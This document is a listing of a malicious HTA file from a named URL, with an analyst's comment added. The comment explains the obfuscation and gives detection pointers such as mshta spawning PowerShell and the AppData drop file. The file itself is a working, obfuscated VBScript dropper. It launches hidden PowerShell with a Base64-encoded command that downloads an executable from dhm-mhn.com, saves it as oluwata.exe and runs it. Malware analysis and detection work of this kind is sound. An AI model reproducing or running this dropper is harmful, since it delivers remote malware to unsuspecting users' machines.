- # Malicious HTA
- # URL: http://dhm-mhn.com/floyd/htazeco0.hta
- <!DOCTYPE html>
- <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
- <html>
- <body>
<!--
  Analyst notes (static reading of this listing only; nothing was executed).

  Purpose: HTA dropper. The one VBScript statement in the script element starts
  PowerShell with a hidden window to fetch and start a second-stage executable;
  self.CLoSe then closes the HTA window.

  NOTE(review): the X-UA-Compatible IE=EmulateIE8 meta above presumably forces a
  legacy document mode in which VBScript still runs. Confirm against the host.

  String obfuscation: every constant is concatenated from Chr/ChrW hex codes.
  StrReverse on a one-character string returns it unchanged, so it is noise.
  Keyword and identifier casing is randomised throughout.
    * CreateObject argument decodes to WScript.Shell (mixed case in the sample).
    * The ExpandEnvironmentStrings argument plus the appended characters decode to
      %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe (mixed case).
    * Run receives that path in quotes (Chr 34), a space (Chr 32), the string
      held in wYyXnfBOfSFL in quotes, and window style 0 (hidden window).

  wYyXnfBOfSFL carries the abbreviated PowerShell switches -eX bYpaSs
  (ExecutionPolicy Bypass), -NoP (NoProfile), -w HIDDeN (WindowStyle Hidden) and
  -ec (EncodedCommand, Base64 of UTF-16LE text). The Base64 decodes to a script that:
    1. creates a System.Net.WebClient and calls DownloadData on
       hxxp://dhm-mhn[.]com/floyd/zeco0.exe (defanged here);
    2. writes the returned bytes with Set-Content (Byte encoding) to
       $env:AppData\oluwata.exe;
    3. launches that file with Start.
  The decoded text is padded with tab, vertical-tab and form-feed characters and
  uses U+201D quotation marks instead of ASCII quotes, so matching on the decoded
  command needs whitespace-tolerant, case-insensitive patterns.

  Detection and containment pointers:
    * mshta.exe spawning powershell.exe, especially with an encoded command
      and hidden window style on the command line;
    * creation and execution of oluwata.exe under the user's AppData directory;
    * outbound HTTP to dhm-mhn[.]com (both the .hta and .exe paths under /floyd/);
    * PowerShell script block logging / AMSI records the decoded command even
      though the command line only shows Base64.

  In this listing the long statement is split across two physical lines after a
  trailing "&"; NOTE(review): this looks like a display wrap of a single source
  line. Verify against the raw paste.
-->
- <SCripT TypE="TExT/vBsCRiPt">
- DIM TClwPHywcEVC : dIm wYyXnfBOfSFL : SET TClwPHywcEVC = CREaTEoBJect ( Chr(&H57) & ChrW(&H53) & ChrW(&H63) & ChrW(&H52) & ChrW(&H49) & StrReverse(Chr(&H50)) & StrReverse(Chr(&H54)) & ChrW(&H2E) & Chr(&H53) & Chr(&H68) & StrReverse(Chr(&H45)) & Chr(&H4C) & Chr(&H4C) ) : wYyXnfBOfSFL = " poWERsheLl.EXe -eX bYpaSs -NoP -w HIDDeN -ec CQALACAAcwBFAFQALQBjAE8AbgB0AGUAbgBUAAkAIAAgAC0AdgBBAAkACwAJACgACQAgACAAbgBFAHcALQBvAGIAagBlAEMAdAAgAAwACQBTAHkAcwB0AGUATQAuAE4ARQB0AC4AVwBFAGIAYwBsAEkAZQBuAFQAIAALAAkAKQAuAEQATwB3AE4AbABPAEEARABEAEEAVABhACgACQAgAAkAHSAgAGgAdAB0AHAAOgAvAC8AZABoAG0ALQBtAGgAbgAuAGMAbwBtAC8AZgBsAG8AeQBkAC8AegBlAGMAbwAwAC4AZQB4AGUAIAAdIAkADAAJACkAIAAgAAkALQBFAE4ACQAMAAkAQgBZAFQAZQAgACAACQAtAHAAYQB0AEgAIAAMACAAHSAkAGUATgB2ADoAQQBwAHAAZABBAFQAQQBcAG8AbAB1AHcAYQB0AGEALgBlAHgAZQAdICAAIAAgADsACQALACAAUwB0AEEAcgB0ACAADAAJAB0gJABFAG4AdgA6AGEAUABQAGQAQQBUAEEAXABvAGwAdQB3AGEAdABhAC4AZQB4AGUAHSA= " : TClwPHywcEVC.ruN CHR ( 34 ) & TClwPHywcEVC.ExpaNdenVIROnmEntstRingS( Chr(&H25) & Chr(&H73) & StrReverse(Chr(&H79)) & StrReverse(Chr(&H53)) & StrReverse(ChrW(&H74)) & ChrW(&H45) & StrReverse(Chr(&H6D)) & StrReverse(Chr(&H72)) & StrReverse(ChrW(&H4F)) & StrReverse(ChrW(&H4F)) & ChrW(&H54) & StrReverse(Chr(&H25)) ) & Chr(&H5C) & ChrW(&H73) & ChrW(&H79) & StrReverse(Chr(&H53)) & Chr(&H74) & ChrW(&H65) & ChrW(&H6D) & Chr(&H33) & StrReverse(ChrW(&H32)) & Chr(&H5C) & StrReverse(Chr(&H77)) & ChrW(&H49) & StrReverse(Chr(&H4E)) & StrReverse(Chr(&H44)) & StrReverse(Chr(&H4F)) & Chr(&H57) & ChrW(&H73) & StrReverse(ChrW(&H50)) & StrReverse(ChrW(&H6F)) & ChrW(&H57) & ChrW(&H45) & StrReverse(ChrW(&H72)) & StrReverse(ChrW(&H53)) & ChrW(&H68) & StrReverse(ChrW(&H65)) & Chr(&H4C) & Chr(&H4C) & StrReverse(ChrW(&H5C)) & StrReverse(Chr(&H76)) & ChrW(&H31) & ChrW(&H2E) & StrReverse(Chr(&H30)) & StrReverse(Chr(&H5C)) & StrReverse(ChrW(&H70)) & ChrW(&H4F) & ChrW(&H57) & StrReverse(ChrW(&H45)) & Chr(&H72) & Chr(&H73) & ChrW(&H68) & Chr(&H45) & StrReverse(Chr(&H4C)) & Chr(&H6C) & Chr(&H2E) & 
Chr(&H65) & Chr(&H78) & Chr(&H65) & CHr ( 34 ) & Chr ( 32 ) & ChR ( 34 ) & wYyXnfBOfSFL & ChR ( 34 ) , 0 : SeT TClwPHywcEVC = notHing
- self.CLoSe
- </script>
- </body>
- </html>